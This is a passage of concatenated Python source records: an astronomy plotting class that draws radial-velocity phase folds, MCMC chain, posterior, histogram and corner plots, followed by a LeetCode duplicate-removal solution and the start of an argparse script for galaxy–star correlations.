__get_params(self, kplanet):\n \"\"\"Retrieve model parameters.\"\"\"\n period = sp.median(self.cold[:, 5 * kplanet])\n amplitude = sp.median(self.cold[:, 5 * kplanet + 1])\n phase = sp.median(self.cold[:, 5 * kplanet + 2])\n eccentricity = sp.median(self.cold[:, 5 * kplanet + 3])\n longitude = sp.median(self.cold[:, 5 * kplanet + 4])\n params = (period, amplitude, phase, eccentricity, longitude)\n return params\n\n def __get_CI_params(self, kplanet, alpha):\n \"\"\"Retrieve model credibility interval for a given alpha.\"\"\"\n _, period_lo, period_up = emplib.credibility_interval(\n self.cold[:, 5 * kplanet], alpha)\n _, amplitude_lo, amplitude_up = emplib.credibility_interval(\n self.cold[:, 5 * kplanet + 1], alpha)\n _, phase_lo, phase_up = emplib.credibility_interval(\n self.cold[:, 5 * kplanet + 2], alpha)\n _, eccentricity_lo, eccentricity_up = emplib.credibility_interval(\n self.cold[:, 5 * kplanet + 3], alpha)\n _, longitude_lo, longitude_up = emplib.credibility_interval(\n self.cold[:, 5 * kplanet + 4], alpha)\n params_lo = (period_lo, amplitude_lo, phase_lo,\n eccentricity_lo, longitude_lo)\n params_up = (period_up, amplitude_up, phase_up,\n eccentricity_up, longitude_up)\n return params_lo, params_up\n\n def __rv_residuals(self):\n \"\"\"Calculate model residuals.\"\"\"\n model = 0.\n for k in range(self.kplanets):\n params = self.__get_params(k)\n model += empmir.mini_RV_model(params, self.time)\n residuals = self.rv0 - model\n return residuals\n\n def __clean_rvs(self):\n \"\"\"Clean radial-velocities by adding the offset and jitter.\"\"\"\n instrumental = self.cold[:, -2 * self.nins:]\n rv0 = copy.deepcopy(self.rv)\n err0 = copy.deepcopy(self.err)\n acc = sp.median(self.cold[:, -2 * self.nins - 1])\n for i in range(self.nins):\n jitter = sp.median(instrumental[:, i])\n offset = sp.median(instrumental[:, i + 1])\n ins = self.ins == i\n # Assume linear acceleration for now.\n rv0[ins] -= offset + acc\n err0[ins] = sp.sqrt(err0[ins] ** 2 + jitter ** 2)\n self.rv0 = rv0\n self.err0 = err0\n pass\n\n def paint_fold(self):\n \"\"\"Create phasefold plot.\"\"\"\n print('\\n\\t\\tPAINTING PHASE FOLDS.')\n if not self.kplanets:\n print('\\n\\t\\tNo planets to paint.')\n # Get globbal max and min for plots\n minx, maxx = self.time.min(), self.time.max()\n cmin, cmax = self.time_cb.min(), self.time_cb.max()\n\n for k in tqdm(range(self.kplanets)):\n params = self.__get_params(k)\n\n fig = plt.figure(figsize=self.phase_figsize)\n gs = gridspec.GridSpec(3, 4)\n ax = fig.add_subplot(gs[:2, :])\n ax_r = fig.add_subplot(gs[-1, :])\n cbar_ax = fig.add_axes([.85, .125, .015, .755])\n fig.subplots_adjust(right=.84, hspace=0)\n\n for i in range(self.nins): # plot per instrument.\n ins = self.ins == i\n t_p, rv_p, err_p = emplib.phasefold(\n self.time[ins], self.rv0[ins], self.err0[ins], params[0]\n )\n _, res_p, _p = emplib.phasefold(\n self.time[ins], self.__rv_residuals()[ins], self.err0[ins],\n params[0]\n )\n # phasefold plot.\n ax.errorbar(\n t_p, rv_p, yerr=err_p, linestyle='', marker=None,\n alpha=.75, ecolor=self.error_color, **self.error_kwargs\n )\n im = ax.scatter(\n t_p, rv_p, marker=self.markers[i], edgecolors='k',\n s=self.phase_size, c=self.time_cb[ins],\n cmap=self.phase_cmap\n )\n im.set_clim(cmin, cmax)\n ax_r.errorbar(\n t_p, res_p, yerr=err_p, linestyle='', marker=None,\n ecolor=self.error_color, **self.error_kwargs\n )\n im_r = ax_r.scatter(\n t_p, res_p, marker=self.markers[i], edgecolors='k',\n s=self.phase_size, c=self.time_cb[ins],\n cmap=self.phase_cmap\n )\n 
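# --- aside -------------------------------------------------------------------
# A minimal numpy-only sketch of the fold computed by emplib.phasefold above,
# under the usual convention phase = (t / P) mod 1 (emplib's exact reference
# epoch and return order are assumptions here):
import numpy as np

def phasefold_sketch(time, rv, err, period):
    phase = (time / period) % 1.0     # fold timestamps onto one orbital cycle
    order = np.argsort(phase)         # sort by phase so the curve draws cleanly
    return phase[order], rv[order], err[order]
# Note in passing: for nins > 1, __clean_rvs reads instrumental[:, i] and
# [:, i + 1], which overlap across instruments if (jitter, offset) are stored
# pairwise; [:, 2 * i] and [:, 2 * i + 1] would match that layout. Worth
# checking against the chain ordering emplib actually emits.
# --- end aside -----------------------------------------------------------------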
im_r.set_clim(cmin, cmax)\n fig.colorbar(\n im, cax=cbar_ax).set_label(\n 'JD - 2450000', rotation=270, labelpad=self.cbar_labelpad,\n fontsize=self.label_fontsize, fontname=self.fontname\n )\n\n time_m = sp.linspace(self.time.min() - 10,\n self.time.max() + 10, 10000)\n rv_m = empmir.mini_RV_model(params, time_m)\n time_m_p, rv_m_p, _ = emplib.phasefold(\n time_m, rv_m, sp.zeros(10000), params[0])\n\n # Plot best model.\n ax.plot(time_m_p, rv_m_p, '-k', linewidth=2)\n # Plot models CI.\n cred_intervals = [.99, .95, .68] # 3, 2, and 1 sigma\n for s in cred_intervals:\n params_lo, params_up = self.__get_CI_params(k, s)\n # Calculate new models.\n rv_m_lo = empmir.mini_RV_model(params_lo, time_m)\n rv_m_up = empmir.mini_RV_model(params_up, time_m)\n _, rv_m_lo_p, _ = emplib.phasefold(\n time_m, rv_m_lo, sp.zeros(10000), params_lo[0])\n _, rv_m_up_p, _ = emplib.phasefold(\n time_m, rv_m_up, sp.zeros(10000), params_up[0])\n ax.fill_between(time_m_p, rv_m_lo_p, rv_m_up_p,\n color=self.CI_color, alpha=.25)\n\n # A line to guide the eye.\n ax_r.axhline(0, color='k', linestyle='--', linewidth=2, zorder=0)\n\n # Labels and tick stuff.\n ax.set_ylabel(\n r'Radial Velocity (m s$^{-1}$)', fontsize=self.label_fontsize,\n fontname=self.fontname\n )\n ax_r.set_ylabel(\n 'Residuals', fontsize=self.label_fontsize,\n fontname=self.fontname\n )\n ax_r.set_xlabel(\n 'Phase', fontsize=self.label_fontsize, fontname=self.fontname\n )\n\n ax_r.get_yticklabels()[-1].set_visible(False)\n ax_r.minorticks_on()\n ax.set_xticks([])\n ax.tick_params(\n axis='both', which='major',\n labelsize=self.tick_labelsize\n )\n ax_r.tick_params(\n axis='both', which='major',\n labelsize=self.tick_labelsize\n )\n for tick in ax.get_yticklabels():\n tick.set_fontname(self.fontname)\n for tick in ax_r.get_yticklabels():\n tick.set_fontname(self.fontname)\n for tick in ax_r.get_xticklabels():\n tick.set_fontname(self.fontname)\n for tick in cbar_ax.get_yticklabels():\n tick.set_fontname(self.fontname)\n cbar_ax.tick_params(labelsize=self.tick_labelsize)\n\n ax.set_xlim(-.01, 1.01)\n ax_r.set_xlim(-.01, 1.01)\n if self.pdf:\n fig.savefig(self.working_dir + 'phase_fold_' +\n str(k + 1) + '.pdf', bbox_inches='tight')\n if self.png:\n fig.savefig(self.working_dir + 'phase_fold_' +\n str(k + 1) + '.png', bbox_inches='tight')\n\n plt.close('all')\n\n def paint_timeseries(self):\n \"\"\"Create timeseries plot.\"\"\"\n print('\\n\\t\\tPAINTING TIMESERIES.')\n if not self.kplanets:\n print('\\n\\t\\tNo planets to paint.')\n # Get globbal max and min for plots\n minx, maxx = self.time.min(), self.time.max()\n cmin, cmax = self.time_cb.min(), self.time_cb.max()\n\n for k in tqdm(range(self.kplanets)):\n params = self.__get_params(k)\n\n fig = plt.figure(figsize=self.full_figsize)\n gs = gridspec.GridSpec(3, 4)\n ax = fig.add_subplot(gs[:2, :])\n ax_r = fig.add_subplot(gs[-1, :])\n cbar_ax = fig.add_axes([.85, .125, .015, .755])\n fig.subplots_adjust(right=.84, hspace=0)\n\n for i in range(self.nins):\n ins = self.ins == i\n\n ax.errorbar(\n self.time[ins] - 2450000, self.rv0[ins],\n yerr=self.err0[ins], linestyle='', marker=None,\n ecolor=self.error_color, **self.error_kwargs\n )\n im = ax.scatter(\n self.time[ins] - 2450000, self.rv0[ins],\n marker=self.markers[i], edgecolors='k', s=self.full_size,\n c=self.time_cb[ins], cmap=self.full_cmap\n )\n im.set_clim(cmin, cmax)\n\n # Get residuals.\n res = self.__rv_residuals()[ins]\n\n ax_r.errorbar(\n self.time[ins] - 2450000, res, yerr=self.err0[ins],\n linestyle='', marker=None, 
ecolor=self.error_color,\n **self.error_kwargs\n )\n im_r = ax_r.scatter(\n self.time[ins] - 2450000, res, marker=self.markers[i],\n edgecolors='k', s=self.full_size, c=self.time_cb[ins],\n cmap=self.full_cmap\n )\n\n im_r.set_clim(cmin, cmax)\n fig.colorbar(\n im, cax=cbar_ax).set_label(\n 'JD - 2450000', rotation=270, labelpad=self.cbar_labelpad,\n fontsize=self.label_fontsize, fontname=self.fontname\n )\n time_m = sp.linspace(self.time.min() - 10,\n self.time.max() + 10, 10000)\n time_m -= 2450000\n rv_m = empmir.mini_RV_model(params, time_m)\n\n # Plot best model.\n ax.plot(time_m, rv_m, '-k', linewidth=2)\n\n # Plot models CI.\n cred_intervals = [.99, .95, .68] # 3, 2, and 1 sigma\n for s in cred_intervals:\n params_lo, params_up = self.__get_CI_params(k, s)\n params_lo = (params[0], params_lo[1],\n params_lo[2], params_lo[3], params_lo[4])\n params_up = (params[0], params_up[1],\n params_up[2], params_up[3], params_up[4])\n # Calculate new models.\n rv_m_lo = empmir.mini_RV_model(params_lo, time_m)\n rv_m_up = empmir.mini_RV_model(params_up, time_m)\n\n ax.fill_between(\n time_m, rv_m_lo, rv_m_up, color=self.CI_color, alpha=.25\n )\n\n # A line to guide the eye.\n ax_r.axhline(0, color='k', linestyle='--', linewidth=2, zorder=0)\n\n # Labels and tick stuff.\n ax.set_ylabel(\n r'Radial Velocity (m s$^{-1}$)', fontsize=self.label_fontsize,\n fontname=self.fontname\n )\n ax_r.set_ylabel(\n 'Residuals', fontsize=self.label_fontsize,\n fontname=self.fontname\n )\n ax_r.set_xlabel(\n 'Time (JD - 2450000)', fontsize=self.label_fontsize,\n fontname=self.fontname\n )\n\n ax_r.get_yticklabels()[-1].set_visible(False)\n ax_r.minorticks_on()\n ax.set_xticks([])\n ax.tick_params(\n axis='both', which='major',\n labelsize=self.tick_labelsize\n )\n ax_r.tick_params(\n axis='both', which='major',\n labelsize=self.tick_labelsize\n )\n for tick in ax.get_yticklabels():\n tick.set_fontname(self.fontname)\n for tick in ax_r.get_yticklabels():\n tick.set_fontname(self.fontname)\n for tick in ax_r.get_xticklabels():\n tick.set_fontname(self.fontname)\n for tick in cbar_ax.get_yticklabels():\n tick.set_fontname(self.fontname)\n cbar_ax.tick_params(labelsize=self.tick_labelsize)\n\n offset = (time_m.max() - time_m.min()) * .01\n ax.set_xlim(time_m.min() - offset, time_m.max() + offset)\n ax_r.set_xlim(time_m.min() - offset, time_m.max() + offset)\n if self.pdf:\n fig.savefig(self.working_dir + 'timeseries_' +\n str(k + 1) + '.pdf', bbox_inches='tight')\n if self.png:\n fig.savefig(self.working_dir + 'timeseries_' +\n str(k + 1) + '.png', bbox_inches='tight')\n plt.close('all')\n\n def paint_chains(self):\n \"\"\"Create traceplots or chain plots for each temperature.\"\"\"\n print('\\n\\t\\tPAINTING CHAINS.')\n for t in tqdm(range(self.ntemps), desc='Brush temperature'):\n chain = self.chains[t]\n\n leftovers = len(chain) % self.nwalkers\n if leftovers == 0:\n pass\n else:\n chain = chain[:-leftovers]\n quasisteps = len(chain) // self.nwalkers\n color = sp.arange(quasisteps)\n colors = sp.array(\n [color for i in range(self.nwalkers)]).reshape(-1)\n\n # Auxiliary variables to coordinate labels and filenames.\n tcount = 0\n pcount = 1\n acc = True\n ins = 0\n ins_count = 1\n\n for i in tqdm(range(self.ndim), desc='Brush type'):\n fig, ax = plt.subplots(figsize=self.chain_figsize)\n\n im = ax.scatter(\n sp.arange(chain.shape[0]), chain[:, i],\n c=colors, lw=0, cmap=self.chain_cmap, s=self.chain_size\n )\n\n ax.set_xlabel('N', fontsize=self.label_fontsize)\n ax.tick_params(\n axis='both', which='major',\n 
labelsize=self.tick_labelsize\n )\n\n cb = plt.colorbar(im, ax=ax)\n cb.set_label('Step Number', fontsize=self.label_fontsize,\n rotation=270, labelpad=self.cbar_labelpad)\n cb.ax.tick_params(labelsize=self.tick_labelsize)\n\n # plot only accel and instrumental chains.\n if not self.kplanets:\n\n if i == 0:\n title = self.chain_titles[5]\n ax.set_ylabel(\n title + self.chain_units[-1],\n fontsize=self.label_fontsize\n )\n counter = 0\n else:\n title = self.chain_titles[6 + counter % 2]\n ax.set_ylabel(\n title + self.chain_units[1],\n fontsize=self.label_fontsize\n )\n counter += 1\n else:\n\n if pcount <= self.kplanets:\n title = self.chain_titles[tcount % 5]\n ax.set_ylabel(title + self.chain_units[tcount % 5],\n fontsize=self.label_fontsize)\n tcount += 1\n else:\n if acc:\n title = self.chain_titles[5]\n ax.set_ylabel(\n title + self.chain_units[-1],\n fontsize=self.label_fontsize\n )\n acc = False\n counter = 0\n else:\n title = self.chain_titles[6 + counter % 2]\n ax.set_ylabel(\n title + self.chain_units[1],\n fontsize=self.label_fontsize\n )\n counter += 1\n\n if pcount <= self.kplanets:\n if self.pdf:\n plt.savefig(self.working_dir + 'chains/' + title +\n '_K' + str(pcount) + '_T' + str(t)\n + '.pdf')\n if self.png:\n plt.savefig(self.working_dir + 'chains/' + title +\n '_K' + str(pcount) + '_T' + str(t)\n + '.png')\n else:\n if self.pdf:\n plt.savefig(self.working_dir + 'chains/' + title\n + '_INS' + str(ins) + '_T' + str(t)\n + '.pdf')\n if self.png:\n plt.savefig(self.working_dir + 'chains/' + title\n + '_INS' + str(ins) + '_T' + str(t)\n + '.png')\n ins_count += 1\n ins += 1 if ins_count % 2 == 0 else 0\n pcount += 1 if tcount % 5 == 0 else 0\n plt.close('all')\n\n def paint_posteriors(self):\n \"\"\"Create posterior plots.\"\"\"\n print('\\n\\t\\tPAINTING POSTERIORS.')\n for t in tqdm(range(self.ntemps), desc='Brush temperature'):\n chain = self.chains[t]\n post = self.posteriors[t]\n\n leftovers = len(chain) % self.nwalkers\n if leftovers == 0:\n pass\n else:\n chain = chain[:-leftovers]\n post = post[:-(len(post) % self.nwalkers)]\n quasisteps = len(chain) // self.nwalkers\n color = sp.arange(quasisteps)\n colors = sp.array(\n [color for i in range(self.nwalkers)]).reshape(-1)\n\n # Auxiliary variables to coordinate labels and filenames.\n tcount = 0\n pcount = 1\n acc = True\n ins = 0\n ins_count = 1\n\n for i in tqdm(range(self.ndim), desc='Brush type'):\n fig, ax = plt.subplots(figsize=self.post_figsize)\n\n im = ax.scatter(\n chain[:, i], post, s=self.post_size, c=colors, lw=0,\n cmap=self.post_cmap, alpha=self.post_alpha\n )\n\n ax.axvline(\n chain[sp.argmax(post), i], color=self.post_v_color,\n linestyle=self.post_v_linestyle, alpha=self.post_v_alpha,\n zorder=10\n )\n\n ax.tick_params(\n axis='both', which='major',\n labelsize=self.tick_labelsize\n )\n ax.tick_params(axis='x', rotation=45)\n ax.set_ylabel('Posterior', fontsize=self.label_fontsize)\n cb = plt.colorbar(im, ax=ax)\n cb.set_label('Step Number', fontsize=self.label_fontsize,\n rotation=270, labelpad=self.cbar_labelpad)\n cb.ax.tick_params(labelsize=self.tick_labelsize)\n\n xaxis = ax.get_xaxis()\n xaxis.set_major_locator(\n ticker.LinearLocator(numticks=self.post_ticknum)\n )\n yaxis = ax.get_yaxis()\n yaxis.set_major_locator(\n ticker.LinearLocator(numticks=self.post_ticknum)\n )\n\n # plot only accel and instrumental chains.\n if not self.kplanets:\n\n if i == 0:\n title = self.chain_titles[5]\n ax.set_xlabel(\n title + self.chain_units[-1],\n fontsize=self.label_fontsize\n )\n counter = 0\n else:\n 
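# --- aside -------------------------------------------------------------------
# The tcount/pcount/acc/counter bookkeeping in this loop walks the flat
# parameter vector [5 Keplerian params per planet, acceleration, then
# (jitter, offset) per instrument]. A table-driven sketch of the same walk;
# param_labels is hypothetical and shown only to document the layout:
def param_labels(kplanets, nins):
    kep = ['Period', 'Amplitude', 'Phase', 'Eccentricity', 'Longitude']
    labels = ['%s_K%d' % (name, k + 1)
              for k in range(kplanets) for name in kep]
    labels.append('Acceleration')
    for i in range(nins):
        labels += ['Jitter_INS%d' % i, 'Offset_INS%d' % i]
    return labels   # len == 5 * kplanets + 1 + 2 * nins == self.ndim
# --- end aside -----------------------------------------------------------------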
title = self.chain_titles[6 + counter % 2]\n ax.set_xlabel(\n title + self.chain_units[1],\n fontsize=self.label_fontsize\n )\n counter += 1\n else:\n\n if pcount <= self.kplanets:\n title = self.chain_titles[tcount % 5]\n ax.set_xlabel(title + self.chain_units[tcount % 5],\n fontsize=self.label_fontsize)\n tcount += 1\n else:\n if acc:\n title = self.chain_titles[5]\n ax.set_xlabel(\n title + self.chain_units[-1],\n fontsize=self.label_fontsize\n )\n acc = False\n counter = 0\n else:\n title = self.chain_titles[6 + counter % 2]\n ax.set_xlabel(\n title + self.chain_units[1],\n fontsize=self.label_fontsize\n )\n counter += 1\n\n if pcount <= self.kplanets:\n if self.pdf:\n plt.savefig(self.working_dir + 'posteriors/' + title +\n '_K' + str(pcount) + '_T' + str(t)\n + '.pdf')\n if self.png:\n plt.savefig(self.working_dir + 'posteriors/' + title +\n '_K' + str(pcount) + '_T' + str(t)\n + '.png')\n else:\n if self.pdf:\n plt.savefig(self.working_dir + 'posteriors/' + title\n + '_INS' + str(ins) + '_T' + str(t)\n + '.pdf')\n if self.png:\n plt.savefig(self.working_dir + 'posteriors/' + title\n + '_INS' + str(ins) + '_T' + str(t)\n + '.png')\n ins_count += 1\n ins += 1 if ins_count % 2 == 0 else 0\n pcount += 1 if tcount % 5 == 0 else 0\n plt.close('all')\n\n def paint_histograms(self):\n \"\"\"Create histograms.\"\"\"\n print('\\n\\t\\tPAINTING HISTOGRAMS.')\n for t in tqdm(range(self.ntemps), desc='Brush temperature'):\n chain = self.chains[t]\n post = self.posteriors[t]\n\n # Auxiliary variables to coordinate labels and filenames.\n tcount = 0\n pcount = 1\n acc = True\n ins = 0\n ins_count = 1\n for i in tqdm(range(self.ndim), desc='Brush type'):\n fig, ax = plt.subplots(figsize=self.post_figsize)\n\n ax.set_ylabel('Frequency', fontsize=self.label_fontsize)\n\n dist = chain[:, i]\n\n peak = dist[sp.argmax(post)]\n n, bins = sp.histogram(dist, self.num_bins, density=1)\n dif = sp.fabs(peak - bins)\n his_peak = bins[sp.argmin(dif)]\n\n res = sp.where(n == 0)[0]\n\n if res.size:\n if len(res) > 2:\n for j in range(len(res)):\n if res[j + 2] - res[j] == 2:\n sub = j\n break\n else:\n sub = res[0]\n\n if bins[sub] > his_peak:\n idx = sp.where(dist <= bins[sub])\n post_sub = post[idx]\n dist_sub = dist[idx]\n else:\n idx = sp.where(dist >= bins[sub])\n post_sub = post[idx]\n dist_sub = dist[idx]\n else:\n dist_sub = dist\n post_sub = post\n\n n, bins, patches = ax.hist(\n dist_sub, self.num_bins, density=1,\n facecolor=self.hist_facecolor, alpha=self.hist_alpha\n )\n\n mu, sigma = norm.fit(dist_sub)\n var = sigma ** 2\n\n # Statistics.\n skew = '{:.4e}'.format(Decimal(sp.stats.skew(dist_sub)))\n kurt = '{:.4e}'.format(Decimal(sp.stats.kurtosis(dist_sub)))\n gmod = '{:.4e}'.format(Decimal(bins[sp.argmax(n)]))\n med = '{:.4e}'.format(Decimal(sp.median(dist_sub)))\n\n span = bins[len(bins) - 1] - bins[0]\n bins_x = ((sp.arange(self.num_bins * 100) /\n (self.num_bins * 100)) * span) + bins[0]\n\n # Make a renormalised gaussian plot.\n y = emplib.hist_gaussian(bins_x, mu, sigma) * n.max()\n\n ax.plot(bins_x, y, 'r-', linewidth=3)\n\n fig.subplots_adjust(left=.15)\n\n ax.set_ylim([0, n.max() * 1.7])\n\n ax.autoscale(enable=True, axis='x', tight=True)\n\n # Add stats to plot as text.\n\n ymin, ymax = ax.get_ylim()\n xmin, xmax = ax.get_xlim()\n\n mu_o = '{:.4e}'.format(Decimal(mu))\n sigma_o = '{:.4e}'.format(Decimal(sigma))\n var_o = '{:.4e}'.format(Decimal(var))\n\n ax.text(xmax - (xmax - xmin) * 0.65, ymax - (ymax - ymin)\n * 0.1, r\"$\\mathcal{N}(\\mu_1,\\sigma^2,\\mu_3,\\mu_4)$\",\n size=25)\n 
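# The six annotations below report the fitted moments: mean (mu_1), variance (sigma^2), skewness (mu_3) and kurtosis (mu_4), plus the median and the histogram mode.\n 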
ax.text(xmax - (xmax - xmin) * 0.8, ymax - (ymax - ymin)\n * 0.180, r\"$\\mu_1 ={}$\".format(mu_o), size=20)\n ax.text(xmax - (xmax - xmin) * 0.8, ymax - (ymax - ymin)\n * 0.255, r\"$\\sigma^2 ={}$\".format(var_o), size=20)\n ax.text(xmax - (xmax - xmin) * 0.8, ymax - (ymax - ymin)\n * 0.330, r\"$\\mu_3 ={}$\".format(skew), size=20)\n\n ax.text(xmax - (xmax - xmin) * 0.5, ymax - (ymax - ymin)\n * 0.180, r\"$\\mu_4 ={}$\".format(kurt), size=20)\n ax.text(xmax - (xmax - xmin) * 0.5, ymax - (ymax - ymin)\n * 0.255, r\"$Median ={}$\".format(med), size=20)\n ax.text(xmax - (xmax - xmin) * 0.5, ymax - (ymax - ymin)\n * 0.330, r\"$Mode ={}$\".format(gmod), size=20)\n\n if not self.kplanets:\n\n if i == 0:\n title = self.chain_titles[5]\n ax.set_xlabel(\n title + self.chain_units[-1],\n fontsize=self.label_fontsize\n )\n counter = 0\n else:\n title = self.chain_titles[6 + counter % 2]\n ax.set_xlabel(\n title + self.chain_units[1],\n fontsize=self.label_fontsize\n )\n counter += 1\n else:\n\n if pcount <= self.kplanets:\n title = self.chain_titles[tcount % 5]\n ax.set_xlabel(title + self.chain_units[tcount % 5],\n fontsize=self.label_fontsize)\n tcount += 1\n else:\n if acc:\n title = self.chain_titles[5]\n ax.set_xlabel(\n title + self.chain_units[-1],\n fontsize=self.label_fontsize\n )\n acc = False\n counter = 0\n else:\n title = self.chain_titles[6 + counter % 2]\n ax.set_xlabel(\n title + self.chain_units[1],\n fontsize=self.label_fontsize\n )\n counter += 1\n\n if pcount <= self.kplanets:\n if self.pdf:\n plt.savefig(self.working_dir + 'histograms/' + title +\n '_K' + str(pcount) + '_T' + str(t)\n + '.pdf')\n if self.png:\n plt.savefig(self.working_dir + 'histograms/' + title +\n '_K' + str(pcount) + '_T' + str(t)\n + '.png')\n else:\n if self.pdf:\n plt.savefig(self.working_dir + 'histograms/' + title\n + '_INS' + str(ins) + '_T' + str(t)\n + '.pdf')\n if self.png:\n plt.savefig(self.working_dir + 'histograms/' + title\n + '_INS' + str(ins) + '_T' + str(t)\n + '.png')\n ins_count += 1\n ins += 1 if ins_count % 2 == 0 else 0\n pcount += 1 if tcount % 5 == 0 else 0\n plt.close('all')\n\n def paint_corners(self):\n \"\"\"Create corner plots. 
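One figure is drawn per planet, from that planet's five Keplerian parameter columns. 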
Cold chain only.\"\"\"\n print('\\n\\t\\tPAINTING CORNERS.')\n titles = ['P', 'K', r'$\\phi$', 'e', r'$\\omega$']\n if not self.kplanets:\n print('No cornerplots for K0.')\n return\n for k in tqdm(range(self.kplanets), desc='Brush number'):\n labels = [t + ' ' + str(k + 1) + '\\n' + u\n for t, u in zip(\n self.chain_titles[:-1 - self.nins],\n self.chain_units[:-1]\n )]\n fig = corner.corner(\n self.cold[:, k * 5:(k + 1) * 5],\n plot_contours=True,\n fill_contours=False,\n plot_datapoints=True,\n no_fill_contours=True,\n max_n_ticks=3\n )\n params = self.__get_params(k)\n params_lo, params_up = self.__get_CI_params(k, .68)\n\n axes = sp.array(fig.axes).reshape((5, 5))\n\n for i in range(5):\n ax = axes[i, i]\n ax.axvline(params[i], color=self.corner_med_c,\n linestyle=self.corner_med_style)\n ax.axvline(params_lo[i], color=self.corner_v_c,\n linestyle=self.corner_v_style)\n ax.axvline(params_up[i], color=self.corner_v_c,\n linestyle=self.corner_v_style)\n t = titles[i] + '={:.2f}'.format(params[i]) + \\\n r'$^{+' + '{:.2f}'.format(params_up[i] - params[i]) + \\\n r'}_{-' + '{:.2f}'.format(params[i] - params_lo[i]) + r'}$'\n\n ax.set_title(t, fontsize=self.corner_fontsize,\n fontname=self.fontname)\n\n for yi in range(5):\n for xi in range(yi):\n ax = axes[yi, xi]\n if xi == 0:\n for tick in ax.yaxis.get_major_ticks():\n tick.label.set_fontsize(self.corner_tick_fontsize)\n tick.label.set_fontname(self.fontname)\n ax.set_ylabel(\n labels[yi],\n labelpad=self.corner_labelpad,\n fontsize=self.corner_fontsize,\n fontname=self.fontname\n )\n if yi == 4:\n for tick in ax.xaxis.get_major_ticks():\n tick.label.set_fontsize(self.corner_tick_fontsize)\n tick.label.set_fontname(self.fontname)\n ax.set_xlabel(\n labels[xi],\n labelpad=self.corner_labelpad,\n fontsize=self.corner_fontsize,\n fontname=self.fontname\n )\n ax.axvline(params[xi], color=self.corner_med_c,\n linestyle=self.corner_med_style)\n ax.axhline(params[yi], color=self.corner_med_c,\n linestyle=self.corner_med_style)\n ax.plot(params[xi], params[yi], self.corner_marker)\n axes[-1, -1].set_xlabel(\n labels[-1],\n labelpad=self.corner_labelpad,\n fontsize=self.corner_fontsize,\n fontname=self.fontname\n )\n for tick in axes[-1, -1].xaxis.get_major_ticks():\n tick.label.set_fontsize(self.corner_tick_fontsize)\n tick.label.set_fontname(self.fontname)\n if self.pdf:\n plt.savefig(self.working_dir + 'corners/' +\n 'corner_K' + str(k + 1) + '.pdf')\n if self.png:\n plt.savefig(self.working_dir + 'corners/' +\n 'corner_K' + str(k + 1) + '.png')\n plt.close('all')\n\n def __read_config(self):\n \"\"\"Read configuration file for plotting.\"\"\"\n # TODO: implement.\n self.phase_figsize = (20, 10)\n self.full_figsize = (20, 10)\n self.chain_figsize = (12, 7)\n self.post_figsize = (12, 7)\n self.hist_figsize = (12, 7)\n self.phase_cmap = 'cool_r'\n self.full_cmap = 'cool_r'\n self.phase_size = 100\n self.full_size = 100\n self.chain_size = 20\n self.chain_cmap = 'viridis'\n self.post_size = 20\n self.post_ticknum = 10\n self.post_alpha = .8\n self.post_cmap = 'viridis'\n self.post_v_color = 'red'\n self.post_v_linestyle = '--'\n self.post_v_linewidth = 2\n self.post_v_alpha = .7\n self.label_fontsize = 22\n self.num_bins = 12\n self.hist_facecolor = 'blue'\n self.hist_alpha = .5\n self.CI_color = 'mediumseagreen'\n self.error_color = 'k'\n self.fontname = 'serif'\n self.corner_med_c = 'firebrick'\n self.corner_v_c = 'lightcoral'\n self.corner_v_style = '-.'\n self.corner_med_style = '--'\n self.tick_labelsize = 20\n self.cbar_labelpad = 30\n 
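# Corner-plot cosmetics; like everything above, hard-coded defaults until the config-file reading flagged in the TODO at the top of this method exists. A minimal sketch of such a reader, assuming a hypothetical key=value file named 'canvas.conf' (the file name and format are assumptions, not part of this code base):\n # import ast\n # for line in open(self.working_dir + 'canvas.conf'):\n # key, _, val = line.partition('=')\n # setattr(self, key.strip(), ast.literal_eval(val.strip()))\n 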
self.corner_fontsize = 20\n self.corner_tick_fontsize = 15\n self.corner_labelpad = 15\n self.corner_marker = 'sr'\n pass\n","sub_path":"emperors_canvas.py","file_name":"emperors_canvas.py","file_ext":"py","file_size_in_byte":37132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
+{"seq_id":"367566811","text":"\nclass Solution(object):\n\n def removeDuplicates(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n\n No need to enumerate\n\n ACE\n 80 ms\n \"\"\"\n writeidx = 0\n for x in nums:\n if writeidx < 2 or nums[writeidx-2] != x:\n nums[writeidx] = x\n writeidx += 1\n return writeidx\n\n def removeDuplicatesV2(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n\n ACE\n 100 ms\n \"\"\"\n writeidx = 0\n for i, x in enumerate(nums):\n if writeidx < 2 or nums[writeidx-2] != x:\n nums[writeidx] = x\n writeidx += 1\n return writeidx\n\n def removeDuplicatesV1(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n\n ACE\n 100 ms\n \"\"\"\n writeidx = 0\n for i, x in enumerate(nums):\n if writeidx >= 2 and nums[writeidx-2] == x:\n continue\n else:\n nums[writeidx] = x\n writeidx += 1\n return writeidx\n\nif __name__ == '__main__':\n s = Solution()\n tests = [\n [1,1,1,2,2,3]\n ]\n for t in tests:\n print(t)\n res = s.removeDuplicates(t)\n print(t[:res])","sub_path":"080_remove_duplicates_from_sorted_array_ii.py","file_name":"080_remove_duplicates_from_sorted_array_ii.py","file_ext":"py","file_size_in_byte":1299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
+{"seq_id":"225050869","text":"#running taus by quadrant.\nimport os\ntoday = '08-04-19_'\ndef parse_args():\n import argparse\n parser = argparse.ArgumentParser(description='Correlation galaxies and reserved stars')\n \n parser.add_argument('--metacal_cat',\n #default='/home2/dfa/sobreira/alsina/catalogs/y3_master/Y3_mastercat_v2_6_20_18_subsampled.h5',\n default='/home2/dfa/sobreira/alsina/catalogs/y3_master/Y3fullmaster/Y3_mastercat_v2_6_20_18.h5', \n help='Full Path to the Metacalibration catalog')\n parser.add_argument('--piff_cat',\n default='/home2/dfa/sobreira/alsina/catalogs/y3a1-v29',\n help='Full Path to the Only stars Piff catalog')\n parser.add_argument('--exps_file',\n default='/home/dfa/sobreira/alsina/DESWL/psf/ally3.grizY',\n #default='/home/dfa/sobreira/alsina/DESWL/psf/testexp',\n help='list of exposures (in lieu of separate exps)')\n parser.add_argument('--bands', default='riz', type=str,\n help='Limit to the given bands')\n parser.add_argument('--bandcombo', default=False,\n action='store_const', const=True,\n help='run rho2 for all combinations of bands, if false run particular combination defined in band')\n parser.add_argument('--use_reserved', default=True,\n action='store_const', const=True,\n help='just use the objects 